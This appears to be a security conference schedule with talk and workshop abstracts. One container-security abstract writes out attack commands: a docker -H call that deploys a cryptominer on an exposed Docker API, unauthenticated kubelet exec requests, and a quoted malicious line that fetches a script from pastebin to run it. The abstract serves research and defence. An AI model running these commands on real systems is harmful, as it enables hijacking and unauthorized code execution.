To see our schedule with full functionality, like timezone conversion and personal scheduling, please enable JavaScript and go here.
10:30
10:30
90min
Hacking Bluetooth Low Energy devices with Btlejack
Damien Cauquil

This workshop will dive in the Bluetooth Low Energy specifications and teach you how to use Btlejack and its features to hack various BLE devices.

You will learn about the various versions of Bluetooth Low Energy (from 4.0 to 5.1), how to effectively perform reconnaissance, how to sniff and analyze any BLE connection but also many tricks and techniques you can use to ease your analysis. Last but not least, you will also learn how to hijack and disconnect devices and how to manually test any BLE stack for vulnerabilities.

All of this by using (mostly) Btlejack \o/

Workshops
Hollenfels
10:30
90min
Reversing WebAssembly Module 101
Patrick Ventuzelo

WebAssembly (WASM) is a new binary format currently supported by all major web-browsers (Firefox, Chrome, Safari and Edge). WebAssembly module are most commonly compiled from C/C++/Rust source code, loaded and executed inside JS scripts. It is known for being used for malicious purposes like cryptojacking but you will legitimately found usage of WebAssembly inside web-browsers addons, nodejs module or even blockchain smart contracts.

In this workshop, I will first introduce WebAssembly concepts and why it’s consider as a “game changer for the web”. Secondly, I will expose how to analyze a WebAssembly module using different techniques (static & dynamic) as well as some open-source tools that make you the life easier (Octopus, Wasabi, ...). Finally, we will hands-on with simple examples/crackmes and finally go throws the analysis of cryptominers.

Workshops
Fischbach
10:30
20min
Smartphone apps: let's talk about privacy
Axelle Apvrille

Smartphone applications do not respect your privacy.
If you are at
Hack.Lu, you probably more or less already know this.
In the best cases, you found a few solutions to minimize the issue.
Or you surrendered (what can we do about it, huh?).

But are you really aware of the extent of the problem? Is it only your IMEI and your location that leak?
Are there are still private apps out there?
Jump in for some Android disassembly, logs and Frida hooks.

Talks
Europe
10:50
10:50
20min
Fingerpointing False Positives: How to better integrate Continuous Improvement into Security Monitoring
Desiree Sacher

This talk is about how you can make your Security Operation Center more efficient and give your bored-out analysts more purpose, by making a small change to your security monitoring process. With a potential huge change in your workflow, and improved results.

Talks
Europe
11:15
11:15
45min
Tiplines Today
harlo

Nowadays, the majority of US-based newsrooms rely on primarily consumer-facing applications to facilitate secure communications with sources. Usage of tools like Signal, WhatsApp, Threema, and others, have spiked in usage as the most state-of-the-art way to ensure confidential conversations with at-risk leakers and whistleblowers. Documents flood newsrooms, sometimes in gigabytes at a time, and journalists need tools to interrogate that data in relative safety from device compromise, legal interception, all while getting the job at the accelerated speed of the news cycle. Let's explore how these tools, from both a technical and behavioral usage standpoint, make the news. Sometimes in a good way, when a story comes out after months of clandestine collaboration with sources, and toiling over data that needs to be interrogated; sometimes in a bad way, when sources get burned, or organizations endanger themselves.

With this talk, I aim to explain a theoretical bridge between hackers and other technologists; and the a special group of end-users (journalists and their sources) who are, often without their prior knowledge, at the complete mercy of tools they barely understand under-the-hood. This talk should be as satisfying for hackers as it will be for folks who love to hear spicy stories about the "sausage gets made" in contemporary newsrooms.

Europe
13:15
13:15
180min
Introduction to Osquery
David Szili

This workshop will introduce osquery to the participants, starting with the capabilities of the tool, how to configure it and use extensions and how to perform fleet management to scale the solution for enterprise environments.

Workshops
Hollenfels
13:15
180min
Java Web Application Secure Coding Workshop
Eva Szilagyi

Context-dependent output encoding? Prepared statement with bind variables? Disable external entity resolution? Storing passwords in salted hash format? If you are involved in Java development, come to my workshop and we will see together, why these are important from a security perspective!

Workshops
Fischbach
13:15
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Workshops
Assembourg
13:15
45min
The Road to Hell is Paved with Bad Passwords
Chris Kubecka

Ever wonder what incident management is like when an embassy gets hacked, by ISIS? Come on a journey of surprisingly weak security, insider threats, a 50 million dollar extortion attempt, diplomatic immunity, city wide security lock down, all while >400 dignitary’s lives dangle in the negotiation crossfire. Join Chris, the lead investigator and resolver on a super-secret squirrel adventure against ISIS & Turkish Intel in The Hague, The Netherlands. Discussing the 2014 Saudi Arabian embassy hack. Whoever said STEM was boring made it boring! Solve the crime and save lives with key takeaways from a real life cyber terrorism investigation. No classified information will be shared, some terrorists were harmed in the making of this talk.

Talks
Europe
14:00
14:00
45min
Say Cheese - How I Ransomwared your DSLR Camera
Eyal Itkin

It's a nice sunny day on your vacation, the views are stunning, and like on any other day you take out your DSLR camera and start taking pictures. Sounds magical right? But when you get back to your hotel the real shock hits you: someone infected your camera with ransomware! All your images are encrypted, and the camera is locked. How could that happen?

In this talk, we show a live demo of this exact scenario. Join us as we take a deep dive into the world of the Picture Transfer Protocol (PTP). The same protocol that allows you to control your camera from your phone or computer, can also enable any attacker to do that and more. We will describe in detail how we found multiple vulnerabilities in the protocol and how we exploited them remotely(!) to take over this embedded device.

But it doesn't end here. While digging into our camera, we found a reliable way to take over most of the DSLR cameras without exploiting any vulnerability at all. We simply had to ask our camera to do that for us, and it worked.

This is the first vulnerability research on the Picture Transfer Protocol, a vendor agnostic logical layer that is common to all modern-day cameras. As DSLR cameras are used by consumers and journalists alike, this opens up the door for future research on these sensitive embedded devices.

Talks
Europe
15:00
15:00
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
15:15
15:15
45min
The regulation (EU) 2019/796 of 17 May 2019 concerning restrictive measures against cyber-attacks threatening the Union or its Member States
Eve Matringe

The Article 215 of the Treaty on the Functioning of the European Union allows the Council to adopt restrictive measures against natural or legal persons and groups or non-State entities in some specific cases. This Regulation applies to cyber-attacks with a significant effect, including attempted cyber-attacks with
a potentially significant effect, which constitute an external threat to the Union or its Member States.
What measures can be adopted, according to what procedure and under what conditions, against whom and what remedies are available.

Talks
Europe
16:00
16:00
180min
Jobfair
Hack.lu

As Hack.lu is the biggest and most established technical information security conference in the Benelux region, it attracts a lot of highly technical attendees and some of them are looking for new challenges.

This is why we decided to give the opportunity to companies looking for such profiles to get in touch with them during the conference.

Schengen
16:00
45min
New Tales of Wireless Input Devices
Matthias Deeg, Gerhard Klostermeier

In our talk, we will present new security tales and vulnerabilities of wireless mice, keyboards, and presenters using 2.4 GHz radio communication that we have collected over the last two years.

In 2016, we published the results of our research project "Of Mice and Keyboards: On the Security of Modern Wireless Desktop Sets" and publicly disclosed several security vulnerabilities in wireless desktop sets using AES encryption of different manufacturers. In the same year, Bastille Research independently published security vulnerabilities in wireless mice and keyboards of different manufacturers, too. As time went by, we have learned more about the (in)security of further wireless input devices like mice, keyboards, and presenters using different 2.4 GHz radio-based technologies, and want to share our experiences and gained knowledge concerning these devices.

In our talk, we want to present answers to unanswered questions of our previous wireless desktop set research, raise the awareness of security issues and practical attacks against vulnerable wireless input devices, and tell some interesting tales.

Talks
Europe
17:00
17:00
20min
Memory forensics analysis of Cisco IOS XR 32 bits routers with 'Amnesic-Sherpa'
Solal jacob

Nowadays attackers are targeting not only computers but also core network equipment like routers by using memory-only attacks that are difficult to detect as the firmware image is not modified. In order to determine if a router was compromised by a memory-only attack, we need to be able to perform forensics analysis on it, but this requires specialized tools. This presentation is about CISCO IOS XR router forensics. We will explain how work the internal of a CISCO IOS XR 32 bits, router running under the QNX operating system. And, as no tool currently exists to analyze CISCO IOS XR routers, we developed a router forensics framework called 'Amnesic-Sherpa', aimed at analyzing memory dump, that can be used to know if a router was compromised. This framework will be released as open-source.

Talks
Europe
17:20
17:20
20min
Kill MD5 - demystifying hash collisions
Ange Albertini

Understanding the impact of hash collisions without a PhD in crypto.
Showing how vulnerable MD5 can be.

Talks
Europe
09:00
09:00
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
09:00
45min
Sensor & Logic Attack Surface of Driverless Vehicles
Zoz

Networked and connected vehicles have the same network attack surface as other IoT devices, but are also heavily reliant on sensor inputs and the need for split second decision making under uncertain conditions, making them suffer a unique set of vulnerabilities even when network attacks are discounted. In this session the state of automated vehicle technology will be presented with a focus on the attack surface presented by vehicles' sensor and control logic suites, and the potential failure modes that could be exploited by malicious hackers and criminals.

Talks
Europe
09:45
09:45
20min
Disturbance: on the Sorry State of Cybersecurity and Potential Cures
Saad Kadhi

Infosec research, good and bad, abounds, like almost everything else in this ‘infobese’ era. Cybersecurity conferences are filled with presentations exposing new vulnerabilities, as if we didn’t have enough of those already, describing best practices or showcasing tools and techniques. That is fine, as long as we keep the end goal in plain sight: protecting the digital realm.

In this blockchain-free talk, we’ll compare past, current and possible future trends of the threat landscape and attempt to demonstrate why, with all our goodwill and altruism, educational and mentoring programs, the sorry state of cybersecurity is here to stay unless we take a step back. It’s hard and yet necessary to question ourselves, to reframe and rephrase the messages that we keep conveying for the last twenty years, and stop the long shoulder-patting tradition. If we really care about cybersecurity, it’s time we address the core problems from a different perspective, one that requires hardship, courage and patience, one that places the audience at the centre, armed with a profit carrot in one hand and a liability stick in the other.

Europe
10:30
10:30
90min
Faup workshop, parse and investigate URLs!
Sebastien Tricaud

Faup is an opensource tool which allows to work with URLs. Mainly parsing, but also, browser emulation and investigation. This workshop will teach the audience how to use Faup, its library, and write modules to do nifty hacks with URLs.

Workshops
Schengen
10:30
20min
Leveraging KVM as a debugging platform
Mathieu

Virtual Machine Introspection keeps opening new possibilities to interact with
Virtual Machines, from sandboxing (VMRay), to cloud monitoring solutions
(BitDefender HVI).

Our debuggers needs to benefit from this approach too, and so far we have seen
multiple open source projects trying to leverage the hypervisor as a new
debugging platform. However, most of these solutions are tied to one
hypervisor.

The VMI ecosystem can only grow if it can bring all developers under the same
roof, and provide the core libraries that will be the foundation for all VMI
applications.

Keeping this vision in mind, pyvmidbg is a GDB stub built on top of LibVMI, a
hypervisor-agnostic VMI library. It can introspect Windows VMs and explore the
execution context to target and debug a specific process running on the system.

One of the goals of pyvmidbg is to attract developers and users by writing the
missing layers that prevent VMI from gaining a wider adoption as of today.

The lack of VMI APIs available on KVM has made of LibVMI a Xen centric library,
despite its flexible architecture. However, the situation recently changed in
2017, thanks to BitDefender proposing a new set of APIs for introspection.

This talk will demonstrate the new KVM introspection subsystem proposed by
BitDefender, its integration in LibVMI, and how pyvmidbg is running on top of
KVM today.

Talks
Europe
10:30
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
10:30
90min
Repacking the unpacker: Applying Time Travel Debugging to malware analysis
Benoit Sevens

In this workshop we will apply the Time Travel Debugging feature of WinDbg, one of the most powerful Windows debuggers, to the field of malware analysis. We will show with concrete examples how this technology can be very effective in reversing complex samples in a timely manner.

Workshops
DieKirch-Echternach
10:50
10:50
20min
The Red Square - Mapping the connections inside Russia's APT Ecosystem
Itay Cohen, Ari Eitan

If the names Turla, Sofacy, and APT29 strike fear into your heart, you are not alone. These are known to be some of the most advanced, sophisticated and notorious APT groups out there -- and not in vain. These Russian-attributed actors are part of a bigger picture in which Russia is one of the strongest powers in the cyberwarfare today. Their advanced tools, unique approaches, and solid infrastructures suggest an enormous and complicated operation that involves different military and government entities inside Russia.

That said, and with all the available information on these groups, there are still some questions to bear in mind: Are the different government entities working alone or are they sharing code and techniques with each other? What artifacts, libraries and code are more likely to be shared between different families and teams of the same actor?

The fog behind these complicated operations made us realize that while we know a lot about single actors, we are short of seeing the bigger picture - a whole ecosystem with actor interaction (or lack thereof) and particular TTPs that can be viewed in a larger scope. We decided to know more and to look at things from a broader perspective. This led us to gather, classify and analyze thousands of Russian APT malware samples in order to find connections - not only between samples, but also between different families and actors.

In this talk, we will describe the process of our research. Namely, we will show how the technologies at our disposal allowed us to take a deep dive into these malware's binary DNA in order to spot the mutual Genes that are shared between Russia's APT families and actors. We will show interesting connections that we found, and present the interactive map we created to visualize this complicated Russian APT ecosystem. We will also release a signature-based tool to detect old and new samples based on the popular mutual Genes we found.

Talks
Europe
11:15
11:15
45min
Fileless Malware Infection and Linux Process Injection in Linux OS
アドリアン ヘンドリック - Hendrik Adrian - @MalwareMustDie

Recent development of the exploitation with file-less method is also affecting the Linux platform too. The process injection and file-less methods used for malicious code execution on some post exploitation tools for Linux are supported to perform those operations. This trend may affect many internet of services and things that can trigger a wider and multiple incidents for more damage, so we may need to re-assess again current security readiness on protecting these platform.

In this presentation we would like to discuss several information, methods of the file-less infection and Linux process injection in the recent trends from the blue-teamer perspective, following by the summary on their usage the way we spotted them in some public incidents. Along with the most applicable methods that may can help to forensics such cases, to help the fellow incident response operatives on handling such cases.

The information shared in this presentation is set on TLP AMBER.

Europe
13:15
13:15
180min
AppSec 101: Understanding and exploiting buffer overflows
Antonin Beaujeant

This workshop will explain one of the most known application security vulnerability: the buffer overflow. We will start from the very beginning explaining what a CPU is, how does it executes operations and coordinate with the memory and inputs/outputs in order to run applications. We will then have a programming crash course (C language) then move to a assembly. Don't worry, we won't go too deep, just enough to understand the next chapter: understanding, identifying and exploiting a buffer overflow.

Workshops
DieKirch-Echternach
13:15
45min
Exploiting bug report systems in the game industry
Andreia Gaita

In the world of development, what do you do when you run into a bug in the library, framework, or middleware you're using? You submit a bug report and describe the steps. The companies providing you with the software expect and encourage you to send in repro code, but the bigger the system, the more complex the code needs to be to reproduce the problem. In the case of game development, the expectation is that when you find a bug, you submit a complete test project that exemplifies the problem, so that test teams can reproduce it. What can these test projects contain? How are they tested by companies developing game engines and middleware? What potential exploitation venues does this open?

There are unique conditions in the game industry that make it particularly vulnerable to certain types of attacks, but its uniqueness also makes it somewhat of a puzzle to the rest of the tech industry. In this talk, we'll go through some of the particulars of how game development works, and how these practices and bug reporting systems can be exploited to gain access to the core of development teams across the game industry.

Talks
Europe
13:15
180min
Hash collisions exploitations
Ange Albertini

To understand the extend of MD5 and SHA1 collision without the maths,
to come up with your own collisions tricks to actually prove that MD5 shouldn't be used.

Workshops
Hollenfels
13:15
90min
Learn to use ONYPHE to have a view on your Internet exposed devices
Patrice Auffret

When a company grows, it becomes difficult to track every Internet exposed assets. Especially nowadays, with the prevalence of shadow IT and shadow Cloud services. Bad guys know it too well, they have tools and do monitor your exposed infrasctructure. You should be the first to uncover a vulnerability or an exposure of sensitive asset before it is exploited for malevolent purposes.

Workshops
Schengen
13:15
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
13:15
180min
Sigma Workshop
Thomas Patzke

How to create Sigma rules and hunt evil in logs.

Workshops
Fischbach
14:00
14:00
45min
What the log?! So many events, so little time…
Miriam Wiesner

Detecting adversaries is not always easy. Especially when it comes to correlating Windows Event Logs to real-world attack patterns and techniques.

Join me to find out how to match Windows Event Log IDs with the MITRE ATT&CK framework and methods to simplify the detection in your environment.

Talks
Europe
15:00
15:00
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
15:15
15:15
45min
The Glitch In The Matrix
Marion

Compared to the hordes of code reviewers and review tools that skim through pristine source code with every release cycle, the attention binary output gets from security engineers is limited. And why would security folks bother, bugs are all human-made; or, are they? Honestly, in reality, most are. Modern compilers and build setups are rather unlikely to accidentally introduce flaws into binaries, let alone security relevant flaws. Except, well, if an attacker gets her hands onto the build chain...
Now, it has been established, that compromised compilers can introduce bugs to output binaries; but really, how stealthy can this be? How small of a change can an attacker plant, and still create a security vulnerability? And which means of detection do we have for such glitches in the matrix? Shall we ask Neo?

Talks
Europe
16:00
16:00
45min
Hacktivism as a defense technique in a cyberwar. #FRD Lessons for Ukraine
Kostiantyn Korsun

Since 2014 Ukraine is under cyberwar.
Energy grid attack BlackEnergy switched off electricity for 230,000 people for 6 hours. NotPetya attack effected ~30% of Ukrainian economy. Airports, railways, banking system, media, critical infrastructure had been attacked by Russian cyber groups (Telebots, BadRabbit, GrayEnergy).
But have those attacks strengthened national cybersecurity system of Ukraine?
Ukrainian cyber activists (hacktivists) checked that and published some shocking results.
This activity got the name #FuckResponsibleDisclosure (#FRD)
My talk is a historical retrospective of #FRD: when and how it started, what emotions it caused in Ukraine, how officials and resources’ owner communicated with hacktivists and others. How #FRD influenced on national cyber security and what local Cybersec-community thinks on #FRD.
The preso contains plenty of expressive screenshots.

Talks
Europe
17:00
17:00
20min
DeTT&CT: Mapping your Blue Team to MITRE ATT&CK
Marcus Bakker, Ruben Bouman

Within blue teams, it is crucial to have sufficient and adequate information on several aspects to prioritise your defence efforts. Important aspects are: visibility (indicate if you have sufficient data sources to be able to see traces of attack techniques), detection (how good are you in detecting attackers) and threat actor behaviours (to determine which attack behaviours are essential for your organisation to defend against).

Obtaining and administrating this information can be a challenge. In this talk we present the DeTT&CT framework, build atop of MITRE ATT&CK, that helps blue teams to gain insight into these aspects and to start prioritising their defence efforts. The ultimate goal of DeTT&CT is to become more resilient against attacks targeting your organisation.

Talks
Europe
17:20
17:20
20min
Defeating APT10 Compiler-level Obfuscations
Takahiro Haruyama

Compiler-level obfuscations like opaque predicates and control flow flattening are starting to be observed in the wild and will be a challenge for malware analysts and researchers. Opaque predicates and control flow flattening are obfuscation methods used to limit malware analysis by defining unused logic, performing needless calculations, and altering code flow so that it is not linear. Manual analysis of malware utilizing these obfuscations is painful and time-consuming.

ANEL (also referred to as UpperCut) is a RAT used by APT10, typically targeting Japan. All recent ANEL samples are obfuscated with opaque predicates and control flow flattening. In this presentation I will explain how to automatically de-obfuscate the ANEL code by modifying the existing IDA Pro plugin HexRaysDeob. Specifically the following topics will be included.

  • Disassembler tool internals (IDA Pro IL microcode)
  • How to define and track opaque predicate patterns for the elimination
  • How to break control flow flattening while considering various conditional/unconditional jump cases even if it heavily depends on the opaque predicate conditions and has multiple switch dispatchers

The modified tool can work for most obfuscated functions in the tested samples. This implementation can deobfuscate approximately 92% of encountered functions. Additionally, most of the failed functions will be properly deobfuscated in IDA 7.3. Sharing the experience and knowledge of the implementation with the community will be valuable as threat actors other than APT10 may also start to use the same obfuscations.

Talks
Europe
19:00
19:00
60min
Call for Failure (CfF 0x0)
Hack.lu

Over Fail the untold truth behind the magic of cybersecurity

Europe
20:15
20:15
60min
Power Point Karaoke
Hack.lu

Fun

Europe
21:30
21:30
60min
Cinema
Hack.lu

Your choice

Europe
22:30
22:30
60min
Cinema
Hack.lu

Your choice

Europe
09:00
09:00
45min
Beyond Windows Forensics with Built-in Microsoft Tooling
Thomas Fischer

Microsoft has slowly been introducing tools to help organisations better manage and troubleshoot Windows performance and issues; these are now entirely integrated into Windows. To improve performance and troubleshooting capabilities, Microsoft introduced System Resource Usage Monitor (SRUM) in Windows 8 and beyond. PowerShell has become the default “command line” management tool for windows administrators. These tools provide both a wealth of information into what has happened and is present on the system.

For Forensics and even Incident Response, these tools are now a go to built-in option to bootstrap and drive the forensics process including opening access to artefacts that overzealous user or even a “smart” attacker has removed. SRUM for instance can provide data points ranging from network to process activitiy providing insight into what, who, when and how an attacker or malicious process introduced itself into the environment.

This talk will help the participant build the foundations to identify which built in tools can assist in the Windows Forensics process and the data points that are available as well as examine how services such as SRUM can be used to extract key data points to provide information for incident response or threat hunting activities.

Talks
Europe
09:00
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
09:45
09:45
20min
Effectiveness in simplicity: The Taskmasters APT
Elmar Nabigaev

It is often thought that APT attacks is complex and involve 0-day exploits, stealthy lateral movement and hidden exfiltration path.
While this can be true, it is rarely the case. Even APT actors follow "it if works - don't broke it" rule and use tried and true tactics. If they can get away with it and achieve their goals, why not?

In this talk I’m going to present our discovery of an APT group which used rather simple TTPs but managed to stay undetected and hidden for years while breaching some high value targets in the fields of government, manufacturing, telecommunications etc.

We’re going to dive deep into incident response cases, dissection of tools and techniques they used to infiltrate targets and cover possible attribution.

I’m also going to talk about problems we faced during responding to these cases and present recommendations how to defend networks against this adversary.

Europe
10:30
10:30
90min
IOCs are dead, long live the IOCs!
Celine Massompierre

Finding information is not a problem, what you do with it is up to you!

Nowadays sharing Indicator of compromise (IOCs) are common, look at the Misp project for example.

At the big data era, having just an indicator like and IP address is not enough and in many cases as useful as a key of a treasure chest without any map. What really matter today is metadata: data about data.

Workshops
Fischbach
10:30
90min
Junior CTF Install Party
Axelle Apvrille

Learn how to install Junior CTF for your kids to test their hacking skills.

Workshops
DieKirch-Echternach
10:30
90min
Open the safe and get cured.
Stijn Tomme

Open the safe and get cured.
From manufacturing your network cable to determining the code… and getting the anti-virus

Assembourg
10:30
90min
Snarf it! Firmware extraction and analysis with open source tools.
Pauline

At the core of every IoT device is its firmware. Detailed security assessment of devices starts with obtaining a copy of the firmware. The firmware can then be statically analysed or dynamically. Several techniques exist for firmware extraction.
This workshop takes participants through a low level firmware extraction process which is easy to perform and doesn’t require expensive hardware.

Workshops
Hollenfels
10:30
45min
Who contains the containers
Emilien, Ioana Andrada

Who contain the containers ?

introduction

Today it is extremely easy to deploy micro-services using containers technologies. And as usual for every easy-to-deploy technologies, people have tendencies to not using common sense before using them: You are one-click away from being easily compromised !

In this talk we will present most common vulnerabilities and unsecure configurations found on containers technologies and how to exploit them. Then we will try to figure out if we can find actually compromised containers on Internet. Finally we will describe recommendations on how to secure and how to detect attacks against container technologies.

Attacks against container technologies

When we speak about container technologies, two main components may be subject to attacks:

  • Containers technologies (docker, rkt, Solaris containers, Microsoft Containers ...)
  • Container orchestration tools (kubernetes, apache meos, docker swarm, docker data center)

Another important part of the environment is the storage container (clusterHQ, BlockBridge,EMC...) but it can be attacked through the orchestration engine so we will not describe them with too much details in this talk.

Also it is important to highlight the fact that most cloud service providers provide their own implemantation of orchestration tools, which can be targeted as well.

exploit vulnerabilities to break out of containers

Worst scenario for containers is the possibility for a malicious or compromised container to escape and attack the host system. Of course it happened with a vulnerability on runC (CVE-2019-5736: runc container breakout).

Vulnerability was discovered by Adam Iwaniuk and Borys Popławski and affect most of the containers softwares and a proof-of-concept is available: https://github.com/Frichetten/CVE-2019-5736-PoC

As this vulnerability is probably the most critical, others are not to be ignored:

  • CVE-2018-11757 (Docker): a Docker action inheriting the Docker tag openwhisk/dockerskeleton:1.3.0 (or earlier) may allow an attacker to replace the user function inside the container if the user code is vulnerable to code exploitation,
  • CVE-2018-8115 (Docker for Windows): A remote code execution vulnerability exists when the Windows Host Compute Service Shim (hcsshim) library fails to properly validate input while importing a container image,
  • Vulnerabilities on "rkt enter" commands (CVE-2019-10144, CVE-2019-10145 and CVE-2019-10146): discovered by Yuval Avrahami, those vulnerabilities could be used to escape to the host system by putting traps on modified binaries in a compromised container (https://www.twistlock.com/labs-blog/breaking-out-of-coresos-rkt-3-new-cves/)

abusing APIs

APIs are great to automate admin tasks ... or compromising at a scale. If not properly secured, API access can be used to start, delete or configure containers or the host sytem.

Here is some attack example abusing APIs:

  • Docker: create container via API

Docker API is exposed on port 2375/TCP or 2376/TCP (SSL). If default configurtion is used (who do that ? :D) a simple POST request give us the possibility to deploy and start a Docker Image. The image will be downloaded from Docker Hub automatically...

We can use a crafted HTTP request or just the docker client as shown bellow:

docker -H target:2376 run --restart unless-stopped --read-only -m 50M -c 512 bitnn/alpine-xmrig -o POOOOL -u WALLET -p X -k

  • Kubernetes: Unauthenticated endpoint on Kubelet (port 10250) to perform exec command

The exploitation take 2 steps, first a POST request to the exec endpoint:

POST "https://target:10250/exec/<namespace>/<podname>/<container-name>?command=whoami&input=1&output=1&tty=1"

Then a GET request (SPDY capable client) using location header from the response of the previous request

wscat -c "https://target:10250/cri/exec/XxXxXxXx" --no-check

A single GET request is used to list the available containers on the target:

GET "https://target:10250/pods"

Those two examples can be reproduced against most orchestration tools of the API endpoints are not properly secured.

compromising containers repositories

Supply-chain attacks can happen on container image repositories. An attacker could successfully push an update to a well-known container image and just wait for victims to deply/update. Or even creating an account on the repository (let say Docker Hub for example) and convincing people to use their images.

That is exacly what happen recently with Zuulu2 botnet (see https://github.com/docker/hub-feedback/issues/1809). Somebody pushed a cryptomining image on Docher Hub and exploit weak configuration to download and run the container image. The image is also used to discover new potential targets.

Is it legit ?

While working on another project, we stumbled accross some strange containers online, so we asked ourself if we could find more of those suspicious stuff. We mostly concentrated on Docker as it is the most popular (so the most targeted)

To do that, we developped some script to extract information on available containers online via their exposed API endpoints and parse the extracted data to highlight potentially "unwanted" containers. Identifying online API is done by leveraging internet scanning services (Shodan, Onyphe and Censys).

Another technique consist of downloading unverifed images (to limit the scope of the investigation, we look for modified alpine images) from container images repositories and analysing startup scripts of those images. A good tool to perform this task for Docker images is Dive (https://github.com/wagoodman/dive).

In this part, we will present some interesting containers we found running online and drill-down to the TTPs used by the TA behind the supposed infection. Here is some examples (all Docker):

Xmrig image

Suspicious level: low

We found some docker image used for cryptocurrency mining which may be suspicious because it is probably the least efficient way to do mining... but we never know.

Nice wget you got there

Suspicious level: high

Ok this time we are sure it is malicious : chroot /mnt /bin/sh -c 'yum install wget -y;apt-get install wget -y;rm hrfbyyu.sh;wget https://pastebin.com/raw/h7HiT3uR ...

So when the image it started, it will install wget via yum OR apt-get, then download and execute a script from pastebin ... does not really look legit ...

The script itself is base64 encoded and contains update and persistence mechanisms for Linux and cryptomining activities.

Xulu botnet

Suspicious level: high

Some month ago, a user named zuulu2 on Docker Hub uploaded malicious images perfoming scanning of other potential victims and cryptomining activities. It spread exploiting open Docker API. Malicious images were removed from Docker Hub.

By getting the list of running or available containers, we can see that the zuulu2 images are still running on several servers.

Dockerfile: CMD ["/run.sh"]

We identified this image posted on Docker Hub 6 month ago. User only uploaded one image and the description was just CMD ["/run.sh"]. By using Dive, we identified modifications from the base image (alpine):

  • adding a user named miner
  • downloading and compiling xmrig
  • starting the mining process (XMR)

Containers security

The security of a container does not resume only to the container itself. A container is based on an image, which contains all the files required to run. But what if the used image is vulnerable or it has some configuration defects,embedded clear text secrets or it might contain embedded malware, intended to do something else than the initial purpose.

Many images for containers are stored usually in a central location because they are easy to control, reuse, share across the community. Do we trust those registries or are we sure that the connection to those registries is secure?

Orchestration tools are great for managing the containers. They pull the images from registries , deploy images into containers and manage the running containers. But is it always clearly defined who has access or not?Do we trust the orchestrator node in the cluster? Is it properly separated the network traffic between the containers in the orchestrator configuration ?

Multiple containers share the same OS kernel instance.Each operating system has a container runtime, which coordinates different OS components in such a way that each container sees only its dedicated resources and it is isolated from other containers running at the same time. Anyone with access to the kernel root account can see and access all containers.The attack surface level on the host OS is pretty big. The attacker can attempt to exploit host OS vulnerabilities, tampering file systems or gain priviledged user access rights.

Hardening

When you think at hardening a container, you have to take into consideration all the components that make a container up and running. And as there is no clear and concrete security for the containers, we have to find measures to harden every component.
We will present best practices for each component.

Container Images Security

  • use only signed images from trusted registry
  • visibility into all layers of the image
  • validation of the configuration of the images, regular patching updates
  • constant monitoring

Host Security

  • harden the host
  • always patch
  • grant authorization wisely,by controlling user access
  • separate partitions for containers
  • audit all the container's activity

Container Runtime Security

  • namespaces - what a container can see and to what extenct can interract with each oter internally
  • cgroups - how much of shared kernel and system resources a container will consume
  • seccomp - secure computing mode
  • process restrictions
  • device and file restrictions

Orchestration environment security

  • limit direct access
  • fine-grained-access control rules
  • administrative boundaries
  • resource quota
  • safe management and distribution of secrets
  • encrypt data exchange

Auditing

It is important to continously scan your containers for vulnerabilities of various kinds,including bugs,inadequate authentication and authorization ,embedded secrets and misconfiguration.
Auditing containers can be challenging, on one side because of their architecture and on the other side the short lifetime and the density of the containers deployed. It becomes really difficult to track what exactly was deployed.

On your host audit regular Linux file system and system calls and also log who is running the container service. Add audit rules for the container service using auditd.
Also make sure you have a container-native log collection agent on your host , which provides automatic collection and processing of container logs.

Monitoring

Monitoring your container activity it is essential in identifying security incidents and providing audit trails.
Containered environments require logging at multiple layers - the host, the container orchestrator and the container itself. * monitor and capture host logs * monitor the container orchestration system used like Docker Swarm, Kubernetes, Apache Mesos and Hashicorp Nomad * ensure adequate log information at the containers, by setting the log level in your container

Tools

There are different tools out there, which might help you in monitoring your containered environment, but this is not done easily.

  • docker remote API - The docker engine client provides an API, through which you collect basic monitoring function of Docker containers
  • container advisor(cAdvisor) - it consists of a container, which can collect,process,aggregate and export information related to running containers.
  • prometheus - monitoring tools that can be used to observe metrics and raise alerts, based on the applied alerting rules over the input data. Everything can be displayed in a UI dashboard,based on Grafana

Conclusion

Micro-services are the future they say. Sure thing for cyber-criminals ! As those technologies will be more and more used and most probably in the cloud, SOC teams need to start worrying about the potential impact and how to face those new threats. It will take time. Oh and we did not spoke about serverless services like AWS Lambda ...

Talks
Europe
11:15
11:15
45min
spispy: opensource SPI flash emulation
Trammell Hudson

spispy is an open source hardware tool for emulating SPI flash chips that makes firmware development and boot security research easier. In this talk we'll discuss the challenges of interfacing on the SPI bus and emulating SPI devices, as well as demonstrate how to use it quickly debug issues with coreboot and how we used spispy to discover a critical class of TOCTOU vulnerabilities in secure boot systems like Intel BootGuard.

Talks
Europe
13:15
13:15
180min
Intro to Dark Arts: Getting Started with CTFs
Geethna T K, Shruti Dixit, Sowmya

This workshop will introduce the participants to the world of CTF contests as a way to learn real-world security skills. Providing them with the basic knowledge for playing CTF and how to get started with solving hands-on challenges in the domains of Cryptography, Reverse Engineering and Binary Exploitation. The workshop will consist of hands-on sessions for each domain as mentioned above to help participants get familiarised with the tools and libraries for each corresponding domains.

Cryptography is the art of disguising confidential data from eavesdroppers and making it accessible only to the authorized parties. It is built from the Number theory, a branch of pure mathematics devoted primarily to the study of integers.
Reverse Engineering, mainly includes understanding assembly language and reversing obfuscated Linux binaries. The attendees will get to learn about the usage of tools such as GDB and GHIDRA for dynamic analysis and IDA for static analysis.
Binary Exploitation is the art of ripping the binaries apart in order to find vulnerabilities and exploit them to spawn a shell on the server. The session will cover topics ranging from basic buffer overflow to learning overwriting return addresses and defeating ASLR.

Workshops
Fischbach
13:15
180min
Introduction to WHIDS an Open Source Endpoint Detection System for Windows
Quentin JEROME

